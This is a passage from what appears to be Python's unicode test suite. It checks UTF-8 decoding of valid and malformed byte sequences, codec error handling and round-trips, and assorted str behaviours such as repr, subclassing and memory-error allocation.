'\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das'
' Nunstuck git und'.encode('utf-8'),
b'\xe6\xad\xa3\xe7\xa2\xba\xe3\x81\xab\xe8\xa8\x80\xe3\x81'
b'\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3\xe3\x81\xaf\xe3'
b'\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe'
b'\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
b'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8'
b'\xaa\x9e\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81'
b'\xe3\x81\x82\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81'
b'\x9f\xe3\x82\x89\xe3\x82\x81\xe3\x81\xa7\xe3\x81\x99\xe3'
b'\x80\x82\xe5\xae\x9f\xe9\x9a\x9b\xe3\x81\xab\xe3\x81\xaf'
b'\xe3\x80\x8cWenn ist das Nunstuck git und'
)
# UTF-8 specific decoding tests
self.assertEqual(str(b'\xf0\xa3\x91\x96', 'utf-8'), '\U00023456' )
self.assertEqual(str(b'\xf0\x90\x80\x82', 'utf-8'), '\U00010002' )
self.assertEqual(str(b'\xe2\x82\xac', 'utf-8'), '\u20ac' )
# Other possible utf-8 test cases:
# * strict decoding testing for all of the
# UTF8_ERROR cases in PyUnicode_DecodeUTF8
def test_utf8_decode_valid_sequences(self):
sequences = [
# single byte
(b'\x00', '\x00'), (b'a', 'a'), (b'\x7f', '\x7f'),
# 2 bytes
(b'\xc2\x80', '\x80'), (b'\xdf\xbf', '\u07ff'),
# 3 bytes
(b'\xe0\xa0\x80', '\u0800'), (b'\xed\x9f\xbf', '\ud7ff'),
(b'\xee\x80\x80', '\uE000'), (b'\xef\xbf\xbf', '\uffff'),
# 4 bytes
(b'\xF0\x90\x80\x80', '\U00010000'),
(b'\xf4\x8f\xbf\xbf', '\U0010FFFF')
]
for seq, res in sequences:
self.assertEqual(seq.decode('utf-8'), res)
def test_utf8_decode_invalid_sequences(self):
# continuation bytes in a sequence of 2, 3, or 4 bytes
continuation_bytes = [bytes([x]) for x in range(0x80, 0xC0)]
# start bytes of a 2-byte sequence equivalent to code points < 0x7F
invalid_2B_seq_start_bytes = [bytes([x]) for x in range(0xC0, 0xC2)]
# start bytes of a 4-byte sequence equivalent to code points > 0x10FFFF
invalid_4B_seq_start_bytes = [bytes([x]) for x in range(0xF5, 0xF8)]
invalid_start_bytes = (
continuation_bytes + invalid_2B_seq_start_bytes +
invalid_4B_seq_start_bytes + [bytes([x]) for x in range(0xF7, 0x100)]
)
for byte in invalid_start_bytes:
self.assertRaises(UnicodeDecodeError, byte.decode, 'utf-8')
for sb in invalid_2B_seq_start_bytes:
for cb in continuation_bytes:
self.assertRaises(UnicodeDecodeError, (sb+cb).decode, 'utf-8')
for sb in invalid_4B_seq_start_bytes:
for cb1 in continuation_bytes[:3]:
for cb3 in continuation_bytes[:3]:
self.assertRaises(UnicodeDecodeError,
(sb+cb1+b'\x80'+cb3).decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x80, 0xA0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xE0'+cb+b'\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xE0'+cb+b'\xBF').decode, 'utf-8')
# surrogates
for cb in [bytes([x]) for x in range(0xA0, 0xC0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xED'+cb+b'\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xED'+cb+b'\xBF').decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x80, 0x90)]:
self.assertRaises(UnicodeDecodeError,
(b'\xF0'+cb+b'\x80\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xF0'+cb+b'\xBF\xBF').decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x90, 0xC0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xF4'+cb+b'\x80\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xF4'+cb+b'\xBF\xBF').decode, 'utf-8')
def test_issue8271(self):
# Issue #8271: during the decoding of an invalid UTF-8 byte sequence,
# only the start byte and the continuation byte(s) are now considered
# invalid, instead of the number of bytes specified by the start byte.
# See http://www.unicode.org/versions/Unicode5.2.0/ch03.pdf (page 95,
# table 3-8, Row 2) for more information about the algorithm used.
FFFD = '\ufffd'
sequences = [
# invalid start bytes
(b'\x80', FFFD), # continuation byte
(b'\x80\x80', FFFD*2), # 2 continuation bytes
(b'\xc0', FFFD),
(b'\xc0\xc0', FFFD*2),
(b'\xc1', FFFD),
(b'\xc1\xc0', FFFD*2),
(b'\xc0\xc1', FFFD*2),
# with start byte of a 2-byte sequence
(b'\xc2', FFFD), # only the start byte
(b'\xc2\xc2', FFFD*2), # 2 start bytes
(b'\xc2\xc2\xc2', FFFD*3), # 3 start bytes
(b'\xc2\x41', FFFD+'A'), # invalid continuation byte
# with start byte of a 3-byte sequence
(b'\xe1', FFFD), # only the start byte
(b'\xe1\xe1', FFFD*2), # 2 start bytes
(b'\xe1\xe1\xe1', FFFD*3), # 3 start bytes
(b'\xe1\xe1\xe1\xe1', FFFD*4), # 4 start bytes
(b'\xe1\x80', FFFD), # only 1 continuation byte
(b'\xe1\x41', FFFD+'A'), # invalid continuation byte
(b'\xe1\x41\x80', FFFD+'A'+FFFD), # invalid cb followed by valid cb
(b'\xe1\x41\x41', FFFD+'AA'), # 2 invalid continuation bytes
(b'\xe1\x80\x41', FFFD+'A'), # only 1 valid continuation byte
(b'\xe1\x80\xe1\x41', FFFD*2+'A'), # 1 valid and the other invalid
(b'\xe1\x41\xe1\x80', FFFD+'A'+FFFD), # 1 invalid and the other valid
# with start byte of a 4-byte sequence
(b'\xf1', FFFD), # only the start byte
(b'\xf1\xf1', FFFD*2), # 2 start bytes
(b'\xf1\xf1\xf1', FFFD*3), # 3 start bytes
(b'\xf1\xf1\xf1\xf1', FFFD*4), # 4 start bytes
(b'\xf1\xf1\xf1\xf1\xf1', FFFD*5), # 5 start bytes
(b'\xf1\x80', FFFD), # only 1 continuation bytes
(b'\xf1\x80\x80', FFFD), # only 2 continuation bytes
(b'\xf1\x80\x41', FFFD+'A'), # 1 valid cb and 1 invalid
(b'\xf1\x80\x41\x41', FFFD+'AA'), # 1 valid cb and 1 invalid
(b'\xf1\x80\x80\x41', FFFD+'A'), # 2 valid cb and 1 invalid
(b'\xf1\x41\x80', FFFD+'A'+FFFD), # 1 invalid cv and 1 valid
(b'\xf1\x41\x80\x80', FFFD+'A'+FFFD*2), # 1 invalid cb and 2 invalid
(b'\xf1\x41\x80\x41', FFFD+'A'+FFFD+'A'), # 2 invalid cb and 1 invalid
(b'\xf1\x41\x41\x80', FFFD+'AA'+FFFD), # 1 valid cb and 1 invalid
(b'\xf1\x41\xf1\x80', FFFD+'A'+FFFD),
(b'\xf1\x41\x80\xf1', FFFD+'A'+FFFD*2),
(b'\xf1\xf1\x80\x41', FFFD*2+'A'),
(b'\xf1\x41\xf1\xf1', FFFD+'A'+FFFD*2),
# with invalid start byte of a 4-byte sequence (rfc2279)
(b'\xf5', FFFD), # only the start byte
(b'\xf5\xf5', FFFD*2), # 2 start bytes
(b'\xf5\x80', FFFD*2), # only 1 continuation byte
(b'\xf5\x80\x80', FFFD*3), # only 2 continuation byte
(b'\xf5\x80\x80\x80', FFFD*4), # 3 continuation bytes
(b'\xf5\x80\x41', FFFD*2+'A'), # 1 valid cb and 1 invalid
(b'\xf5\x80\x41\xf5', FFFD*2+'A'+FFFD),
(b'\xf5\x41\x80\x80\x41', FFFD+'A'+FFFD*2+'A'),
# with invalid start byte of a 5-byte sequence (rfc2279)
(b'\xf8', FFFD), # only the start byte
(b'\xf8\xf8', FFFD*2), # 2 start bytes
(b'\xf8\x80', FFFD*2), # only one continuation byte
(b'\xf8\x80\x41', FFFD*2 + 'A'), # 1 valid cb and 1 invalid
(b'\xf8\x80\x80\x80\x80', FFFD*5), # invalid 5 bytes seq with 5 bytes
# with invalid start byte of a 6-byte sequence (rfc2279)
(b'\xfc', FFFD), # only the start byte
(b'\xfc\xfc', FFFD*2), # 2 start bytes
(b'\xfc\x80\x80', FFFD*3), # only 2 continuation bytes
(b'\xfc\x80\x80\x80\x80\x80', FFFD*6), # 6 continuation bytes
# invalid start byte
(b'\xfe', FFFD),
(b'\xfe\x80\x80', FFFD*3),
# other sequences
(b'\xf1\x80\x41\x42\x43', '\ufffd\x41\x42\x43'),
(b'\xf1\x80\xff\x42\x43', '\ufffd\ufffd\x42\x43'),
(b'\xf1\x80\xc2\x81\x43', '\ufffd\x81\x43'),
(b'\x61\xF1\x80\x80\xE1\x80\xC2\x62\x80\x63\x80\xBF\x64',
'\x61\uFFFD\uFFFD\uFFFD\x62\uFFFD\x63\uFFFD\uFFFD\x64'),
]
for n, (seq, res) in enumerate(sequences):
self.assertRaises(UnicodeDecodeError, seq.decode, 'utf-8', 'strict')
self.assertEqual(seq.decode('utf-8', 'replace'), res)
self.assertEqual((seq+b'b').decode('utf-8', 'replace'), res+'b')
self.assertEqual(seq.decode('utf-8', 'ignore'),
res.replace('\uFFFD', ''))
def assertCorrectUTF8Decoding(self, seq, res, err):
with self.assertRaises(UnicodeDecodeError) as cm:
seq.decode('utf-8')
exc = cm.exception
self.assertIn(err, str(exc))
self.assertEqual(seq.decode('utf-8', 'replace'), res)
self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'replace'),
'aaaa' + res + 'bbbb')
res = res.replace('\ufffd', '')
self.assertEqual(seq.decode('utf-8', 'ignore'), res)
self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'ignore'),
'aaaa' + res + 'bbbb')
def test_invalid_start_byte(self):
FFFD = '\ufffd'
for byte in b'\x80\xA0\x9F\xBF\xC0\xC1\xF5\xFF':
self.assertCorrectUTF8Decoding(bytes([byte]), '\ufffd',
'invalid start byte')
def test_unexpected_end_of_data(self):
sequences = [
'C2', 'DF',
'E0 A0', 'E0 BF', 'E1 80', 'E1 BF', 'EC 80', 'EC BF',
'ED 80', 'ED 9F', 'EE 80', 'EE BF', 'EF 80', 'EF BF',
'F0 90', 'F0 BF', 'F0 90 80', 'F0 90 BF', 'F0 BF 80', 'F0 BF BF',
'F1 80', 'F1 BF', 'F1 80 80', 'F1 80 BF', 'F1 BF 80', 'F1 BF BF',
'F3 80', 'F3 BF', 'F3 80 80', 'F3 80 BF', 'F3 BF 80', 'F3 BF BF',
'F4 80', 'F4 8F', 'F4 80 80', 'F4 80 BF', 'F4 8F 80', 'F4 8F BF'
]
FFFD = '\ufffd'
for seq in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), '\ufffd',
'unexpected end of data')
def test_invalid_cb_for_2bytes_seq(self):
FFFD = '\ufffd'
FFFDx2 = FFFD * 2
sequences = [
('C2 00', FFFD+'\x00'), ('C2 7F', FFFD+'\x7f'),
('C2 C0', FFFDx2), ('C2 FF', FFFDx2),
('DF 00', FFFD+'\x00'), ('DF 7F', FFFD+'\x7f'),
('DF C0', FFFDx2), ('DF FF', FFFDx2),
]
for seq, res in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
'invalid continuation byte')
def test_invalid_cb_for_3bytes_seq(self):
FFFD = '\ufffd'
FFFDx2 = FFFD * 2
sequences = [
('E0 00', FFFD+'\x00'), ('E0 7F', FFFD+'\x7f'), ('E0 80', FFFDx2),
('E0 9F', FFFDx2), ('E0 C0', FFFDx2), ('E0 FF', FFFDx2),
('E0 A0 00', FFFD+'\x00'), ('E0 A0 7F', FFFD+'\x7f'),
('E0 A0 C0', FFFDx2), ('E0 A0 FF', FFFDx2),
('E0 BF 00', FFFD+'\x00'), ('E0 BF 7F', FFFD+'\x7f'),
('E0 BF C0', FFFDx2), ('E0 BF FF', FFFDx2), ('E1 00', FFFD+'\x00'),
('E1 7F', FFFD+'\x7f'), ('E1 C0', FFFDx2), ('E1 FF', FFFDx2),
('E1 80 00', FFFD+'\x00'), ('E1 80 7F', FFFD+'\x7f'),
('E1 80 C0', FFFDx2), ('E1 80 FF', FFFDx2),
('E1 BF 00', FFFD+'\x00'), ('E1 BF 7F', FFFD+'\x7f'),
('E1 BF C0', FFFDx2), ('E1 BF FF', FFFDx2), ('EC 00', FFFD+'\x00'),
('EC 7F', FFFD+'\x7f'), ('EC C0', FFFDx2), ('EC FF', FFFDx2),
('EC 80 00', FFFD+'\x00'), ('EC 80 7F', FFFD+'\x7f'),
('EC 80 C0', FFFDx2), ('EC 80 FF', FFFDx2),
('EC BF 00', FFFD+'\x00'), ('EC BF 7F', FFFD+'\x7f'),
('EC BF C0', FFFDx2), ('EC BF FF', FFFDx2), ('ED 00', FFFD+'\x00'),
('ED 7F', FFFD+'\x7f'),
('ED A0', FFFDx2), ('ED BF', FFFDx2), # see note ^
('ED C0', FFFDx2), ('ED FF', FFFDx2), ('ED 80 00', FFFD+'\x00'),
('ED 80 7F', FFFD+'\x7f'), ('ED 80 C0', FFFDx2),
('ED 80 FF', FFFDx2), ('ED 9F 00', FFFD+'\x00'),
('ED 9F 7F', FFFD+'\x7f'), ('ED 9F C0', FFFDx2),
('ED 9F FF', FFFDx2), ('EE 00', FFFD+'\x00'),
('EE 7F', FFFD+'\x7f'), ('EE C0', FFFDx2), ('EE FF', FFFDx2),
('EE 80 00', FFFD+'\x00'), ('EE 80 7F', FFFD+'\x7f'),
('EE 80 C0', FFFDx2), ('EE 80 FF', FFFDx2),
('EE BF 00', FFFD+'\x00'), ('EE BF 7F', FFFD+'\x7f'),
('EE BF C0', FFFDx2), ('EE BF FF', FFFDx2), ('EF 00', FFFD+'\x00'),
('EF 7F', FFFD+'\x7f'), ('EF C0', FFFDx2), ('EF FF', FFFDx2),
('EF 80 00', FFFD+'\x00'), ('EF 80 7F', FFFD+'\x7f'),
('EF 80 C0', FFFDx2), ('EF 80 FF', FFFDx2),
('EF BF 00', FFFD+'\x00'), ('EF BF 7F', FFFD+'\x7f'),
('EF BF C0', FFFDx2), ('EF BF FF', FFFDx2),
]
for seq, res in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
'invalid continuation byte')
def test_invalid_cb_for_4bytes_seq(self):
FFFD = '\ufffd'
FFFDx2 = FFFD * 2
sequences = [
('F0 00', FFFD+'\x00'), ('F0 7F', FFFD+'\x7f'), ('F0 80', FFFDx2),
('F0 8F', FFFDx2), ('F0 C0', FFFDx2), ('F0 FF', FFFDx2),
('F0 90 00', FFFD+'\x00'), ('F0 90 7F', FFFD+'\x7f'),
('F0 90 C0', FFFDx2), ('F0 90 FF', FFFDx2),
('F0 BF 00', FFFD+'\x00'), ('F0 BF 7F', FFFD+'\x7f'),
('F0 BF C0', FFFDx2), ('F0 BF FF', FFFDx2),
('F0 90 80 00', FFFD+'\x00'), ('F0 90 80 7F', FFFD+'\x7f'),
('F0 90 80 C0', FFFDx2), ('F0 90 80 FF', FFFDx2),
('F0 90 BF 00', FFFD+'\x00'), ('F0 90 BF 7F', FFFD+'\x7f'),
('F0 90 BF C0', FFFDx2), ('F0 90 BF FF', FFFDx2),
('F0 BF 80 00', FFFD+'\x00'), ('F0 BF 80 7F', FFFD+'\x7f'),
('F0 BF 80 C0', FFFDx2), ('F0 BF 80 FF', FFFDx2),
('F0 BF BF 00', FFFD+'\x00'), ('F0 BF BF 7F', FFFD+'\x7f'),
('F0 BF BF C0', FFFDx2), ('F0 BF BF FF', FFFDx2),
('F1 00', FFFD+'\x00'), ('F1 7F', FFFD+'\x7f'), ('F1 C0', FFFDx2),
('F1 FF', FFFDx2), ('F1 80 00', FFFD+'\x00'),
('F1 80 7F', FFFD+'\x7f'), ('F1 80 C0', FFFDx2),
('F1 80 FF', FFFDx2), ('F1 BF 00', FFFD+'\x00'),
('F1 BF 7F', FFFD+'\x7f'), ('F1 BF C0', FFFDx2),
('F1 BF FF', FFFDx2), ('F1 80 80 00', FFFD+'\x00'),
('F1 80 80 7F', FFFD+'\x7f'), ('F1 80 80 C0', FFFDx2),
('F1 80 80 FF', FFFDx2), ('F1 80 BF 00', FFFD+'\x00'),
('F1 80 BF 7F', FFFD+'\x7f'), ('F1 80 BF C0', FFFDx2),
('F1 80 BF FF', FFFDx2), ('F1 BF 80 00', FFFD+'\x00'),
('F1 BF 80 7F', FFFD+'\x7f'), ('F1 BF 80 C0', FFFDx2),
('F1 BF 80 FF', FFFDx2), ('F1 BF BF 00', FFFD+'\x00'),
('F1 BF BF 7F', FFFD+'\x7f'), ('F1 BF BF C0', FFFDx2),
('F1 BF BF FF', FFFDx2), ('F3 00', FFFD+'\x00'),
('F3 7F', FFFD+'\x7f'), ('F3 C0', FFFDx2), ('F3 FF', FFFDx2),
('F3 80 00', FFFD+'\x00'), ('F3 80 7F', FFFD+'\x7f'),
('F3 80 C0', FFFDx2), ('F3 80 FF', FFFDx2),
('F3 BF 00', FFFD+'\x00'), ('F3 BF 7F', FFFD+'\x7f'),
('F3 BF C0', FFFDx2), ('F3 BF FF', FFFDx2),
('F3 80 80 00', FFFD+'\x00'), ('F3 80 80 7F', FFFD+'\x7f'),
('F3 80 80 C0', FFFDx2), ('F3 80 80 FF', FFFDx2),
('F3 80 BF 00', FFFD+'\x00'), ('F3 80 BF 7F', FFFD+'\x7f'),
('F3 80 BF C0', FFFDx2), ('F3 80 BF FF', FFFDx2),
('F3 BF 80 00', FFFD+'\x00'), ('F3 BF 80 7F', FFFD+'\x7f'),
('F3 BF 80 C0', FFFDx2), ('F3 BF 80 FF', FFFDx2),
('F3 BF BF 00', FFFD+'\x00'), ('F3 BF BF 7F', FFFD+'\x7f'),
('F3 BF BF C0', FFFDx2), ('F3 BF BF FF', FFFDx2),
('F4 00', FFFD+'\x00'), ('F4 7F', FFFD+'\x7f'), ('F4 90', FFFDx2),
('F4 BF', FFFDx2), ('F4 C0', FFFDx2), ('F4 FF', FFFDx2),
('F4 80 00', FFFD+'\x00'), ('F4 80 7F', FFFD+'\x7f'),
('F4 80 C0', FFFDx2), ('F4 80 FF', FFFDx2),
('F4 8F 00', FFFD+'\x00'), ('F4 8F 7F', FFFD+'\x7f'),
('F4 8F C0', FFFDx2), ('F4 8F FF', FFFDx2),
('F4 80 80 00', FFFD+'\x00'), ('F4 80 80 7F', FFFD+'\x7f'),
('F4 80 80 C0', FFFDx2), ('F4 80 80 FF', FFFDx2),
('F4 80 BF 00', FFFD+'\x00'), ('F4 80 BF 7F', FFFD+'\x7f'),
('F4 80 BF C0', FFFDx2), ('F4 80 BF FF', FFFDx2),
('F4 8F 80 00', FFFD+'\x00'), ('F4 8F 80 7F', FFFD+'\x7f'),
('F4 8F 80 C0', FFFDx2), ('F4 8F 80 FF', FFFDx2),
('F4 8F BF 00', FFFD+'\x00'), ('F4 8F BF 7F', FFFD+'\x7f'),
('F4 8F BF C0', FFFDx2), ('F4 8F BF FF', FFFDx2)
]
for seq, res in sequences:
self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
'invalid continuation byte')
def test_codecs_idna(self):
# Test whether trailing dot is preserved
self.assertEqual("www.python.org.".encode("idna"), b"www.python.org.")
def test_codecs_errors(self):
# Error handling (encoding)
self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii')
self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii','strict')
self.assertEqual('Andr\202 x'.encode('ascii','ignore'), b"Andr x")
self.assertEqual('Andr\202 x'.encode('ascii','replace'), b"Andr? x")
self.assertEqual('Andr\202 x'.encode('ascii', 'replace'),
'Andr\202 x'.encode('ascii', errors='replace'))
self.assertEqual('Andr\202 x'.encode('ascii', 'ignore'),
'Andr\202 x'.encode(encoding='ascii', errors='ignore'))
# Error handling (decoding)
self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii')
self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii', 'strict')
self.assertEqual(str(b'Andr\202 x', 'ascii', 'ignore'), "Andr x")
self.assertEqual(str(b'Andr\202 x', 'ascii', 'replace'), 'Andr\uFFFD x')
self.assertEqual(str(b'\202 x', 'ascii', 'replace'), '\uFFFD x')
# Error handling (unknown character names)
self.assertEqual(b"\\N{foo}xx".decode("unicode-escape", "ignore"), "xx")
# Error handling (truncated escape sequence)
self.assertRaises(UnicodeError, b"\\".decode, "unicode-escape")
self.assertRaises(TypeError, b"hello".decode, "test.unicode1")
self.assertRaises(TypeError, str, b"hello", "test.unicode2")
self.assertRaises(TypeError, "hello".encode, "test.unicode1")
self.assertRaises(TypeError, "hello".encode, "test.unicode2")
# Error handling (wrong arguments)
self.assertRaises(TypeError, "hello".encode, 42, 42, 42)
# Error handling (lone surrogate in PyUnicode_TransformDecimalToASCII())
self.assertRaises(UnicodeError, float, "\ud800")
self.assertRaises(UnicodeError, float, "\udf00")
self.assertRaises(UnicodeError, complex, "\ud800")
self.assertRaises(UnicodeError, complex, "\udf00")
def test_codecs(self):
# Encoding
self.assertEqual('hello'.encode('ascii'), b'hello')
self.assertEqual('hello'.encode('utf-7'), b'hello')
self.assertEqual('hello'.encode('utf-8'), b'hello')
self.assertEqual('hello'.encode('utf-8'), b'hello')
self.assertEqual('hello'.encode('utf-16-le'), b'h\000e\000l\000l\000o\000')
self.assertEqual('hello'.encode('utf-16-be'), b'\000h\000e\000l\000l\000o')
self.assertEqual('hello'.encode('latin-1'), b'hello')
# Default encoding is utf-8
self.assertEqual('\u2603'.encode(), b'\xe2\x98\x83')
# Roundtrip safety for BMP (just the first 1024 chars)
for c in range(1024):
u = chr(c)
for encoding in ('utf-7', 'utf-8', 'utf-16', 'utf-16-le',
'utf-16-be', 'raw_unicode_escape',
'unicode_escape', 'unicode_internal'):
with warnings.catch_warnings():
# unicode-internal has been deprecated
warnings.simplefilter("ignore", DeprecationWarning)
self.assertEqual(str(u.encode(encoding),encoding), u)
# Roundtrip safety for BMP (just the first 256 chars)
for c in range(256):
u = chr(c)
for encoding in ('latin-1',):
self.assertEqual(str(u.encode(encoding),encoding), u)
# Roundtrip safety for BMP (just the first 128 chars)
for c in range(128):
u = chr(c)
for encoding in ('ascii',):
self.assertEqual(str(u.encode(encoding),encoding), u)
# Roundtrip safety for non-BMP (just a few chars)
with warnings.catch_warnings():
# unicode-internal has been deprecated
warnings.simplefilter("ignore", DeprecationWarning)
u = '\U00010001\U00020002\U00030003\U00040004\U00050005'
for encoding in ('utf-8', 'utf-16', 'utf-16-le', 'utf-16-be',
'raw_unicode_escape',
'unicode_escape', 'unicode_internal'):
self.assertEqual(str(u.encode(encoding),encoding), u)
# UTF-8 must be roundtrip safe for all code points
# (except surrogates, which are forbidden).
u = ''.join(map(chr, list(range(0, 0xd800)) +
list(range(0xe000, 0x110000))))
for encoding in ('utf-8',):
self.assertEqual(str(u.encode(encoding),encoding), u)
def test_codecs_charmap(self):
# 0-127
s = bytes(range(128))
for encoding in (
'cp037', 'cp1026', 'cp273',
'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
'cp863', 'cp865', 'cp866', 'cp1125',
'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
'iso8859_2', 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6',
'iso8859_7', 'iso8859_9',
'koi8_r', 'koi8_t', 'koi8_u', 'kz1048', 'latin_1',
'mac_cyrillic', 'mac_latin2',
'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
'cp1256', 'cp1257', 'cp1258',
'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
'cp1006', 'iso8859_8',
### These have undefined mappings:
#'cp424',
### These fail the round-trip:
#'cp875'
):
self.assertEqual(str(s, encoding).encode(encoding), s)
# 128-255
s = bytes(range(128, 256))
for encoding in (
'cp037', 'cp1026', 'cp273',
'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
'cp863', 'cp865', 'cp866', 'cp1125',
'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
'iso8859_2', 'iso8859_4', 'iso8859_5',
'iso8859_9', 'koi8_r', 'koi8_u', 'latin_1',
'mac_cyrillic', 'mac_latin2',
### These have undefined mappings:
#'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
#'cp1256', 'cp1257', 'cp1258',
#'cp424', 'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
#'iso8859_3', 'iso8859_6', 'iso8859_7', 'koi8_t', 'kz1048',
#'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
### These fail the round-trip:
#'cp1006', 'cp875', 'iso8859_8',
):
self.assertEqual(str(s, encoding).encode(encoding), s)
def test_concatenation(self):
self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def" "ghi"), "abcdefghi")
self.assertEqual(("abc" "def" "ghi"), "abcdefghi")
def test_printing(self):
class BitBucket:
def write(self, text):
pass
out = BitBucket()
print('abc', file=out)
print('abc', 'def', file=out)
print('abc', 'def', file=out)
print('abc', 'def', file=out)
print('abc\n', file=out)
print('abc\n', end=' ', file=out)
print('abc\n', end=' ', file=out)
print('def\n', file=out)
print('def\n', file=out)
def test_ucs4(self):
x = '\U00100000'
y = x.encode("raw-unicode-escape").decode("raw-unicode-escape")
self.assertEqual(x, y)
y = br'\U00100000'
x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
self.assertEqual(x, y)
y = br'\U00010000'
x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
self.assertEqual(x, y)
try:
br'\U11111111'.decode("raw-unicode-escape")
except UnicodeDecodeError as e:
self.assertEqual(e.start, 0)
self.assertEqual(e.end, 10)
else:
self.fail("Should have raised UnicodeDecodeError")
def test_conversion(self):
# Make sure __str__() works properly
class ObjectToStr:
def __str__(self):
return "foo"
class StrSubclassToStr(str):
def __str__(self):
return "foo"
class StrSubclassToStrSubclass(str):
def __new__(cls, content=""):
return str.__new__(cls, 2*content)
def __str__(self):
return self
self.assertEqual(str(ObjectToStr()), "foo")
self.assertEqual(str(StrSubclassToStr("bar")), "foo")
s = str(StrSubclassToStrSubclass("foo"))
self.assertEqual(s, "foofoo")
self.assertIs(type(s), StrSubclassToStrSubclass)
s = StrSubclass(StrSubclassToStrSubclass("foo"))
self.assertEqual(s, "foofoo")
self.assertIs(type(s), StrSubclass)
def test_unicode_repr(self):
class s1:
def __repr__(self):
return '\\n'
class s2:
def __repr__(self):
return '\\n'
self.assertEqual(repr(s1()), '\\n')
self.assertEqual(repr(s2()), '\\n')
def test_printable_repr(self):
self.assertEqual(repr('\U00010000'), "'%c'" % (0x10000,)) # printable
self.assertEqual(repr('\U00014000'), "'\\U00014000'") # nonprintable
# This test only affects 32-bit platforms because expandtabs can only take
# an int as the max value, not a 64-bit C long. If expandtabs is changed
# to take a 64-bit long, this test should apply to all platforms.
@unittest.skipIf(sys.maxsize > (1 << 32) or struct.calcsize('P') != 4,
'only applies to 32-bit platforms')
def test_expandtabs_overflows_gracefully(self):
self.assertRaises(OverflowError, 't\tt\t'.expandtabs, sys.maxsize)
@support.cpython_only
def test_expandtabs_optimization(self):
s = 'abc'
self.assertIs(s.expandtabs(), s)
def test_raiseMemError(self):
if struct.calcsize('P') == 8:
# 64 bits pointers
ascii_struct_size = 48
compact_struct_size = 72
else:
# 32 bits pointers
ascii_struct_size = 24
compact_struct_size = 36
for char in ('a', '\xe9', '\u20ac', '\U0010ffff'):
code = ord(char)
if code < 0x100:
char_size = 1 # sizeof(Py_UCS1)
struct_size = ascii_struct_size
elif code < 0x10000:
char_size = 2 # sizeof(Py_UCS2)
struct_size = compact_struct_size
else:
char_size = 4 # sizeof(Py_UCS4)
struct_size = compact_struct_size
# Note: sys.maxsize is half of the actual max allocation because of
# the signedness of Py_ssize_t. Strings of maxlen-1 should in principle
# be allocatable, given enough memory.
maxlen = ((sys.maxsize - struct_size) // char_size)
alloc = lambda: char * maxlen
self.assertRaises(MemoryError, alloc)
self.assertRaises(MemoryError, alloc)
def test_format_subclass(self):
class S(str):
def __str__(self):
return '__str__ overridden'
s = S('xxx')
self.assertEqual("%s" % s, '__str__ overridden')
self.assertEqual("{}".format(s), '__str__ overridden')
def test_subclass_add(self):
class S(str):
def __add__(self, o):
return "3"
self.assertEqual(S("4") + S("5"), "3")
class S(str):
def __iadd__(self, o):
return "3"
s = S("1")
s += "4"
self.assertEqual(s, "3")
def test_getnewargs(self):
text = 'abc'
args = text.__getnewargs__()
self.assertIsNot(args[0], text)
self.assertEqual(args[0], text)
self.assertEqual(len(args), 1)
def test_resize(self):
for length in range(1, 100, 7):
# generate a fresh string (refcount=1)
text = 'a' * length + 'b'
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
# fill wstr internal field
abc = text.encode('unicode_internal')
self.assertEqual(abc.decode('unicode_internal'), text)
# resize text: wstr field must be cleared and then recomputed
text += 'c'
abcdef = text.encode('unicode_internal')
self.assertNotEqual(abc, abcdef)
self.assertEqual(abcdef.decode('unicode_internal'), text)
def test_compare(self):
# Issue #17615
N = 10
ascii = 'a' * N
ascii2 = 'z' * N
latin = '\x80' * N
latin2 = '\xff' * N
bmp = '\u0100' * N
bmp2 = '\uffff' * N
astral = '\U00100000' * N
astral2 = '\U0010ffff' * N
strings = (
